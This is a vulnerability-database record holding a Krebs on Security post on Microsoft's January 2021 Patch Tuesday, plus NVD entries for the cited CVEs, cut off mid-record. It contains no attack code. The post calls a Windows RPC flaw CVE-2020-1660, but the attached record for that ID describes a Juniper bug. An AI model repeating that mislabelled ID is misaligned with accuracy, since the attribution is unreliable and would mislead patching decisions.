{"id": "KREBS:B3F20C0C41C613971FDADBAE93382CDF", "type": "krebs", "bulletinFamily": "blog", "title": "Microsoft Patch Tuesday, January 2021 Edition", "description": "**Microsoft** today released updates to plug more than 80 security holes in its **Windows** operating systems and other software, including one that is actively being exploited and another which was disclosed prior to today. Ten of the flaws earned Microsoft&#x27;s most-dire &quot;critical&quot; rating, meaning they could be exploited by malware or miscreants to seize remote control over unpatched systems with little or no interaction from Windows users.\n\n\n\nMost concerning of this month&#x27;s batch is probably a critical bug ([CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)) in Microsoft&#x27;s default anti-malware suite -- **Windows Defender** -- that is seeing active exploitation. Microsoft recently stopped providing a great deal of detail in their vulnerability advisories, so it&#x27;s not entirely clear how this is being exploited.\n\nBut **Kevin Breen**, director of research at **Immersive Labs**, says depending on the vector the flaw could be trivial to exploit.\n\n&quot;It could be as simple as sending a file,&quot; he said. &quot;The user doesn&#x27;t need to interact with anything, as Defender will access it as soon as it is placed on the system.&quot;\n\nFortunately, this bug is probably already patched by Microsoft on end-user systems, as the company continuously updates Defender outside of the normal monthly patch cycle.\n\nBreen called attention to another critical vulnerability this month -- [CVE-2020-1660](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1660>) -- which is a remote code execution flaw in nearly every version of Windows that earned a [CVSS score](<https://www.first.org/cvss/>) of 8.8 (10 is the most dangerous).\n\n&quot;They classify this vulnerability as &#x27;low&#x27; in complexity, meaning an attack could be easy to reproduce,&quot; Breen said. &quot;However, they also note that it\u2019s &#x27;less likely&#x27; to be exploited, which seems counterintuitive. Without full context of this vulnerability, we have to rely on Microsoft to make the decision for us.&quot;\n\nCVE-2020-1660 is actually just one of five bugs in a core Microsoft service called **Remote Procedure Call** (RPC), which is responsible for a lot of heavy lifting in Windows. Some of the more memorable computer worms of the last decade spread automatically by exploiting RPC vulnerabilities.\n\n**Allan Liska**, senior security architect at **Recorded Future**, said while it is concerning that so many vulnerabilities around the same component were released simultaneously, two previous vulnerabilities in RPC -- [CVE-2019-1409](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1409>) and [CVE-2018-8514](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2018-8514>) -- were not widely exploited.\n\nThe remaining 70 or so flaws patched this month earned Microsoft&#x27;s less-dire &quot;important&quot; ratings, which is not to say they&#x27;re much less of a security concern. Case in point: [CVE-2021-1709](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1709>), which is an &quot;elevation of privilege&quot; flaw in Windows 8 through 10 and Windows Server 2008 through 2019.\n\n&quot;Unfortunately, this type of vulnerability is often quickly exploited by attackers,&quot; Liska said. &quot;For example, [CVE-2019-1458](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1458>) was announced on December 10th of 2019, and by December 19th an attacker was seen selling an exploit for the vulnerability on underground markets. So, while CVE-2021-1709 is only rated as [an information exposure flaw] by Microsoft it should be prioritized for patching.&quot;\n\n**Trend Micro&#x27;s ZDI Initiative** pointed out another flaw marked &quot;important&quot; -- [CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>), an elevation of privilege bug in Windows 8, 10 and some Windows Server 2012 and 2019 that was publicly disclosed by ZDI prior to today.\n\n&quot;It was also discovered by Google likely because this patch corrects a bug introduced by a previous patch,&quot; ZDI&#x27;s **Dustin Childs** said. &quot;The previous CVE was being exploited in the wild, so it\u2019s within reason to think this CVE will be actively exploited as well.\u201d\n\nSeparately, Adobe released security updates to tackle at least eight vulnerabilities [across a range of products](<https://blogs.adobe.com/psirt/?p=1960>), including **Adobe Photoshop** and **Illustrator**. There are no **Flash Player** updates because Adobe retired the browser plugin in December (hallelujah!), and Microsoft&#x27;s update cycle from last month removed the program from Microsoft&#x27;s browsers.\n\nWindows 10 users should be aware that the operating system will download updates and install them all at once on its own schedule, closing out active programs and rebooting the system. If you wish to ensure Windows has been set to pause updating so you have ample opportunity to back up your files and/or system, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nPlease back up your system before applying any of these updates. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once. You never know when a patch roll-up will bork your system or possibly damage important files. For those seeking more flexible and full-featured backup options (including incremental backups), [Acronis](<https://www.acronis.com/en-us/products/true-image/>) and [Macrium](<https://www.macrium.com/>) are two that I&#x27;ve used previously and are worth a look.\n\nThat said, there don&#x27;t appear to be any major issues cropping up yet with this month&#x27;s update batch. But before you apply updates consider paying a visit to [AskWoody.com](<https://www.askwoody.com/category/microsoft-windows-patches-security/>), which usually has the skinny on any reports about problematic patches.\n\nAs always, if you experience glitches or issues installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.", "published": "2021-01-13T01:32:20", "modified": "2021-01-13T01:32:20", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://krebsonsecurity.com/2021/01/microsoft-patch-tuesday-january-2021-edition/", "reporter": "BrianKrebs", "references": [], "cvelist": ["CVE-2018-8514", "CVE-2019-1409", "CVE-2019-1458", "CVE-2020-1660", "CVE-2021-1647", "CVE-2021-1648", "CVE-2021-1660", "CVE-2021-1709"], "lastseen": "2021-01-13T02:27:43", "viewCount": 232, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-8514", "CVE-2019-1409", "CVE-2021-1660", "CVE-2021-1709", "CVE-2021-1648", "CVE-2020-1660", "CVE-2021-1647", "CVE-2019-1458"]}, {"type": "attackerkb", "idList": ["AKB:3609E46B-E023-474D-B14A-026E01AF8EA9", "AKB:C5336A4C-EEE0-4EA3-AD28-85F0EF3F0F75", "AKB:0E829C08-804A-436D-A730-1B474A82E4A7", "AKB:06000FAE-591B-46C7-8573-3D63BDDD0D13"]}, {"type": "symantec", "idList": ["SMNTC-106079", "SMNTC-110790", "SMNTC-111060"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:D1C46696E4E69F5182E6FECCD3884846", "QUALYSBLOG:84DFCF34CC23A9FDDFBD73DEF70C8C04"]}, {"type": "thn", "idList": ["THN:970890B8E519A3BC5427798160F5F09C", "THN:592EF1422E531E5A7AD2804EA7E024CD", "THN:9CF96D7230D0DBA395C1DEDA718226AD"]}, {"type": "securelist", "idList": ["SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7", "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "SECURELIST:4F6413DE862444B5FA0B192AF22A042D"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_JAN_4598243.NASL", "SMB_NT_MS21_JAN_4598275.NASL", "SMB_NT_MS21_JAN_4598278.NASL", "SMB_NT_MS21_JAN_4598230.NASL", "SMB_NT_MS21_JAN_WIN_DEFENDER.NASL", "SMB_NT_MS21_JAN_4598287.NASL", "SMB_NT_MS21_JAN_4598245.NASL", "SMB_NT_MS21_JAN_4598279.NASL", "SMB_NT_MS21_JAN_FEP.NASL", "SMB_NT_MS21_JAN_4598231.NASL"]}, {"type": "cisa", "idList": ["CISA:F7C7CFE30EB8A6B7C1DCDEA50F649F74"]}, {"type": "mscve", "idList": ["MS:CVE-2021-1648", "MS:CVE-2021-1660", "MS:CVE-2018-8514", "MS:CVE-2021-1709", "MS:CVE-2019-1458", "MS:CVE-2019-1409", "MS:CVE-2021-1647"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:A8AF62CC15B38126207722D29F080EE3", "RAPID7BLOG:BE902C7628D3F969596F8BE1DD0207C1", "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D"]}, {"type": "threatpost", "idList": ["THREATPOST:FF67AF009F2F0031599099334F6CC306", "THREATPOST:8A816F536308CF8DB9594CD95292E06E", "THREATPOST:7E0D83AD71F0D13E7AF6CC3E38AC5F6F", "THREATPOST:F0CFD85C624CF71A4056F7DCC02BD683", "THREATPOST:230DF95E70EB9C4F372C198798822D19", "THREATPOST:B879E243998561911585BBD37B7F33E9"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:C38FDAA2A9E5E349305313C6D17A0D3A"]}, {"type": "zdi", "idList": ["ZDI-21-024", "ZDI-21-078", "ZDI-21-022", "ZDI-21-020"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/CHROME_OBJECT_CREATE/", "MSF:EXPLOIT/WINDOWS/LOCAL/CVE_2019_1458_WIZARDOPIUM/"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156651", "PACKETSTORM:159569"]}, {"type": "exploitdb", "idList": ["EDB-ID:48180"]}, {"type": "zdt", "idList": ["1337DAY-ID-34066"]}, {"type": "krebs", "idList": ["KREBS:537C1540357C1E3360A8168D22F44CB5"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:C2A64C2133DFD2ACB457C2DD2790CBF7", "GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126", "GOOGLEPROJECTZERO:4C8E7D595A367E9DA6260DA13FAF3886", "GOOGLEPROJECTZERO:A596034F451F58030932B2FC46FB6F38"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815862", "OPENVAS:1361412562310815737", "OPENVAS:1361412562310814612", "OPENVAS:1361412562310814615", "OPENVAS:1361412562310815867", "OPENVAS:1361412562310814619", "OPENVAS:1361412562310814614", "OPENVAS:1361412562310814616", "OPENVAS:1361412562310814613", "OPENVAS:1361412562310815735"]}, {"type": "kaspersky", "idList": ["KLA11868", "KLA11616", "KLA11884", "KLA11862", "KLA11385"]}], "modified": "2021-01-13T02:27:43", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-01-13T02:27:43", "rev": 2}, "vulnersScore": 6.5}}

{"cve": [{"lastseen": "2021-02-02T07:55:04", "description": "Microsoft Defender Remote Code Execution Vulnerability", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T20:15:00", "title": "CVE-2021-1647", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1647"], "modified": "2021-01-14T19:28:00", "cpe": ["cpe:/a:microsoft:security_essentials:-", "cpe:/a:microsoft:system_center_endpoint_protection:-", "cpe:/a:microsoft:system_center_endpoint_protection:2012", "cpe:/a:microsoft:windows_defender:-"], "id": "CVE-2021-1647", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1647", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:system_center_endpoint_protection:2012:-:*:*:*:*:*:*", "cpe:2.3:a:microsoft:security_essentials:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:system_center_endpoint_protection:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:windows_defender:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:system_center_endpoint_protection:2012:r2:*:*:*:*:*:*"]}, {"lastseen": "2021-03-05T16:41:19", "description": "Microsoft splwow64 Elevation of Privilege Vulnerability", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T20:15:00", "title": "CVE-2021-1648", "type": "cve", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2021-03-04T15:21:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-1648", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1648", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:55:04", "description": "Remote Procedure Call Runtime Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-1658, CVE-2021-1664, CVE-2021-1666, CVE-2021-1667, CVE-2021-1671, CVE-2021-1673, CVE-2021-1700, CVE-2021-1701.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T20:15:00", "title": "CVE-2021-1660", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1660"], "modified": "2021-01-20T13:59:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2021-1660", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1660", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:55:04", "description": "Windows Win32k Elevation of Privilege Vulnerability", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-12T20:15:00", "title": "CVE-2021-1709", "type": "cve", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1709"], "modified": "2021-01-21T13:49:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2021-1709", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1709", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:52:43", "description": "An information disclosure vulnerability exists when Remote Procedure Call runtime improperly initializes objects in memory, aka \"Remote Procedure Call runtime Information Disclosure Vulnerability.\" This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.", "edition": 5, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-12-12T00:29:00", "title": "CVE-2018-8514", "type": "cve", "cwe": ["CWE-665"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8514"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2016:1709", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_7:-"], "id": "CVE-2018-8514", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8514", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T07:37:01", "description": "When DNS filtering is enabled on Juniper Networks Junos MX Series with one of the following cards MS-PIC, MS-MIC or MS-MPC, an incoming stream of packets processed by the Multiservices PIC Management Daemon (mspmand) process, responsible for managing \"URL Filtering service\", may crash, causing the Services PIC to restart. While the Services PIC is restarting, all PIC services including DNS filtering service (DNS sink holing) will be bypassed until the Services PIC completes its boot process. This vulnerability might allow an attacker to cause an extended Denial of Service (DoS) attack against the device and to cause clients to be vulnerable to DNS based attacks by malicious DNS servers when they send DNS requests through the device. As a result, devices which were once protected by the DNS Filtering service are no longer protected and at risk of exploitation. This issue affects Juniper Networks Junos OS: 17.3 versions prior to 17.3R3-S8; 18.3 versions prior to 18.3R3-S1; 18.4 versions prior to 18.4R3; 19.1 versions prior to 19.1R3; 19.2 versions prior to 19.2R2; 19.3 versions prior to 19.3R3. This issue does not affect Juniper Networks Junos OS 17.4, 18.1, and 18.2.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "baseScore": 9.9, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.3}, "published": "2020-10-16T21:15:00", "title": "CVE-2020-1660", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1660"], "modified": "2020-10-28T18:00:00", "cpe": 